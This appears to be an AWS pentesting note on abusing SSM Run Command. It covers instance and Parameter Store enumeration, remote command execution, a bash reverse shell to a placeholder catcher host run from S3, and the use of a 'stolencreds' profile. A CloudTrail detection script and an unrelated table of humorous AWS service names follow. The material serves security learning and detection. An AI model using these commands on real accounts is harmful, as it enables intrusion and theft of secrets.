- The SSM agent must be installed on the machines.
- It's used to create roles and policies.
```bash
aws ssm describe-instance-information
# Get instances
aws ssm describe-instance-information --output text --query "InstanceInformationList[*]"
```
- Get the "ifconfig" CommandId:

```bash
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP config" --parameters commands=ifconfig --output text --query "Command.CommandId"
```

- Fetch the output of the CommandId generated for ifconfig:

```bash
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}"
```
```bash
aws ssm send-command --document-name "AWS-RunShellScript" --comment "RCE test: whoami" --targets "Key=instanceids,Values=[instanceid]" --parameters 'commands=whoami'
aws ssm list-command-invocations --command-id "[CommandId]" --details
```
- You already need to have reverse.sh uploaded to S3:

```bash
#!/bin/bash
bash -i >& /dev/tcp/REVERSE-SHELL-CATCHER/9999 0>&1
```

- Start your listener, then run the script from S3 (the inner JSON quotes must be escaped for the CLI to parse the `sourceInfo` value):

```bash
aws ssm send-command --document-name "AWS-RunRemoteScript" --instance-ids "INSTANCE-ID-HERE" --parameters '{"sourceType":["S3"],"sourceInfo":["{\"path\":\"PATH-TO-S3-SHELL-SCRIPT\"}"],"commandLine":["/bin/bash NAME-OF-SHELL-SCRIPT"]}' --query "Command.CommandId"
```
```bash
aws ssm describe-parameters
aws ssm get-parameters --names "PARAMETER-NAME-HERE"
```
```bash
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
```
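Every `send-command` above lands in CloudTrail as an `ssm.amazonaws.com` `SendCommand` event carrying the document name, which is what a defender keys on. The following detector is an added example, not code from the original page: it scores SSM records and escalates a principal that enumerates instances or parameters and then sends an execution document. The record shapes are constructed and simplified, the document set assumes the two documents used above plus their PowerShell equivalent, and records are assumed to arrive in chronological order.

```python
import json

# Documents that run arbitrary commands or scripts on the managed instance.
EXEC_DOCUMENTS = {"AWS-RunShellScript", "AWS-RunPowerShellScript", "AWS-RunRemoteScript"}
# Calls that enumerate managed instances or Parameter Store ahead of any execution.
RECON_CALLS = {"DescribeInstanceInformation", "DescribeParameters", "GetParameters"}

# Constructed, simplified CloudTrail records (not real log data): enumeration by one principal
# followed by AWS-RunShellScript, then AWS-RunRemoteScript from a principal that never enumerated.
SAMPLE_LOG = json.loads("""{"Records": [
 {"eventSource": "ssm.amazonaws.com", "eventName": "DescribeInstanceInformation",
  "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ops"}, "sourceIPAddress": "203.0.113.10"},
 {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
  "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ops"}, "sourceIPAddress": "203.0.113.10",
  "requestParameters": {"documentName": "AWS-RunShellScript", "instanceIds": ["i-0123456789abcdef0"]}},
 {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
  "userIdentity": {"arn": "arn:aws:iam::111122223333:user/deploy"}, "sourceIPAddress": "198.51.100.7",
  "requestParameters": {"documentName": "AWS-RunRemoteScript", "instanceIds": ["i-0123456789abcdef0"]}}
]}""")["Records"]

def classify_event(event):
    """Return (severity, reason) for one CloudTrail record, or None if it is not SSM-relevant."""
    if event.get("eventSource") != "ssm.amazonaws.com":
        return None
    name = event.get("eventName")
    params = event.get("requestParameters") or {}
    if name == "SendCommand":
        doc = params.get("documentName", "")
        severity = "high" if doc in EXEC_DOCUMENTS else "medium"
        return (severity, f"SendCommand {doc} on {params.get('instanceIds')}")
    if name in RECON_CALLS:
        return ("low", f"SSM enumeration via {name}")
    return None

def find_suspicious(events):
    """Score each record; escalate actors that enumerate and later send a command."""
    findings, recon_actors = [], set()
    for event in events:  # records are assumed to be in chronological order
        result = classify_event(event)
        if result is None:
            continue
        severity, reason = result
        actor = event.get("userIdentity", {}).get("arn", "unknown")
        if severity == "low":
            recon_actors.add(actor)
        elif actor in recon_actors:
            severity, reason = "critical", "enumeration then execution: " + reason
        findings.append({"severity": severity, "actor": actor, "reason": reason,
                         "source_ip": event.get("sourceIPAddress")})
    return findings
```

Feed it the `Records` array of a real CloudTrail log file; pairing the `SendCommand` finding with `list-command-invocations` output for the same CommandId recovers what actually ran.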
AWS Services Summary

| AWS Service | Should have been called | Use this to | It's like |
|---|---|---|---|
| EC2 | Amazon Virtual Servers | Host the bits of things you think of as a computer. | It's handwavy, but EC2 instances are similar to the virtual private servers you'd get at Linode, DigitalOcean or Rackspace. |
| IAM | Users, Keys and Certs | Set up additional users, set up new AWS Keys and policies. | |
| S3 | Amazon Unlimited FTP Server | Store images and other assets for websites. Keep backups and share files between services. Host static websites. Also, many of the other AWS services write and read from S3. | |
| VPC | Amazon Virtual Colocated Rack | Overcome objections that "all our stuff is on the internet!" by adding an additional layer of security. Makes it appear as if all of your AWS services are on the same little network instead of being small pieces in a much bigger network. | If you're familiar with networking: VLANs |
| Lambda | AWS App Scripts | Run little self-contained snippets of JS, Java or Python to do discrete tasks. Sort of a combination of a queue and execution in one. Used for storing and then executing changes to your AWS setup or responding to events in S3 or DynamoDB. | |
| API Gateway | API Proxy | Proxy your app's API through this so you can throttle bad client traffic, test new versions, and present methods more cleanly. | 3Scale |
| RDS | Amazon SQL | Be your app's MySQL, Postgres, and Oracle database. | Heroku Postgres |
| Route53 | Amazon DNS + Domains | Buy a new domain and set up the DNS records for that domain. | DNSimple, GoDaddy, Gandi |
| SES | Amazon Transactional Email | Send one-off emails like password resets, notifications, etc. You could use it to send a newsletter if you wrote all the code, but that's not a great idea. | SendGrid, Mandrill, Postmark |
| Cloudfront | Amazon CDN | Make your websites load faster by spreading out static file delivery to be closer to where your users are. | MaxCDN, Akamai |
| CloudSearch | Amazon Fulltext Search | Pull in data on S3 or in RDS and then search it for every instance of 'Jimmy.' | Sphinx, Solr, ElasticSearch |
| DynamoDB | Amazon NoSQL | Be your app's massively scalable key-value-ish store. | MongoLab |
| Elasticache | Amazon Memcached | Be your app's Memcached or Redis. | Redis to Go, Memcachier |
| Elastic Transcoder | Amazon Beginning Cut Pro | Deal with video weirdness (change formats, compress, etc.). | |
| SQS | Amazon Queue | Store data for future processing in a queue. The lingo for this is storing "messages" but it doesn't have anything to do with email or SMS. SQS doesn't have any logic; it's just a place to put things and take things out. | RabbitMQ, Sidekiq |
| WAF | AWS Firewall | Block bad requests to Cloudfront-protected sites (aka stop people trying 10,000 passwords against /wp-admin). | Sophos, Kaspersky |
| Cognito | Amazon OAuth as a Service | Give end users (non-AWS) the ability to log in with Google, Facebook, etc. | OAuth.io |
| Device Farm | Amazon Drawer of Old Android Devices | Test your app on a bunch of different iOS and Android devices simultaneously. | MobileTest, iOS emulator |
| Mobile Analytics | Spot on Name, Amazon Product Managers take note | Track what people are doing inside of your app. | Flurry |
| SNS | Amazon Messenger | Send mobile notifications, emails and/or SMS messages. | UrbanAirship, Twilio |
| CodeCommit | Amazon GitHub | Version control your code - hosted Git. | GitHub, BitBucket |
| Code Deploy | Not bad | Get your code from your CodeCommit repo (or GitHub) onto a bunch of EC2 instances in a sane way. | Heroku, Capistrano |
| CodePipeline | Amazon Continuous Integration | Run automated tests on your code and then do stuff with it depending on whether it passes those tests. | CircleCI, Travis |
| EC2 Container Service | Amazon Docker as a Service | Put a Dockerfile into an EC2 instance so you can run a website. | |
| Elastic Beanstalk | Amazon Platform as a Service | Move your app hosted on Heroku to AWS when it gets too expensive. | Heroku, BlueMix, Modulus |
| AppStream | Amazon Citrix | Put a copy of a Windows application on a Windows machine that people get remote access to. | Citrix, RDP |
| Direct Connect | Pretty spot on actually | Pay your Telco + AWS to get a dedicated leased line from your data center or network to AWS. Cheaper than Internet out for data. | A toll road turnpike bypassing the crowded side streets. |
| Directory Service | Pretty spot on actually | Tie together other apps that need a Microsoft Active Directory to control them. | |
| WorkDocs | Amazon Unstructured Files | Share Word Docs with your colleagues. | Dropbox, DataAnywhere |
| WorkMail | Amazon Company Email | Give everyone in your company the same email system and calendar. | Google Apps for Domains |
| Workspaces | Amazon Remote Computer | Gives you a standard Windows desktop that you're remotely controlling. | |
| Service Catalog | Amazon Setup Already | Give other AWS users in your group access to preset apps you've built so they don't have to read guides like this. | |
| Storage Gateway | S3 pretending it's part of your corporate network | Stop buying more storage to keep Word Docs on. Make automating getting files into S3 from your corporate network easier. | |
| Data Pipeline | Amazon ETL | Extract, Transform and Load data from elsewhere in AWS. Schedule when it happens and get alerts when it fails. | |
| Elastic Map Reduce | Amazon Hadooper | Iterate over massive text files of raw data that you're keeping in S3. | Treasure Data |
| Glacier | Really slow Amazon S3 | Make backups of your backups that you keep on S3. For long-term archiving. Also, beware the cost of getting data back out in a hurry. | |
| Kinesis | Amazon High Throughput | Ingest lots of data very quickly (for things like analytics or people retweeting Kanye) that you then later use other AWS services to analyze. | Kafka |
| RedShift | Amazon Data Warehouse | Store a whole bunch of analytics data, do some processing, and dump it out. | |
| Machine Learning | Skynet | Predict future behavior from existing data for problems like fraud detection or "people that bought x also bought y." | |
| SWF | Amazon EC2 Queue | Build a service of "deciders" and "workers" on top of EC2 to accomplish a set task. Unlike SQS, logic is set up inside the service to determine how and what should happen. | IronWorker |
| Snowball | AWS Big Old Portable Storage | Get a bunch of hard drives you can attach to your network to make getting large amounts of data (terabytes) into and out of AWS easier. | Shipping a Network Attached Storage device to AWS |
| CloudFormation | Amazon Services Setup | Set up a bunch of connected AWS services in one go. | |
| CloudTrail | Amazon Logging | Log who is doing what in your AWS stack (API calls). | |
| CloudWatch | Amazon Status Pager | Get alerts about AWS services messing up or disconnecting. | PagerDuty, Statuspage |
| Config | Amazon Configuration Management | Keep from going insane if you have a large AWS setup and changes are happening that you want to track. | |
| OpsWorks | Amazon Chef | Handle running your application with things like auto-scaling. | |
| Trusted Advisor | Amazon Pennypincher | Find out where you're paying too much in your AWS setup (unused EC2 instances, etc.). | |
| Inspector | Amazon Auditor | Scans your AWS setup to determine if you've set it up in an insecure way. | Alert Logic |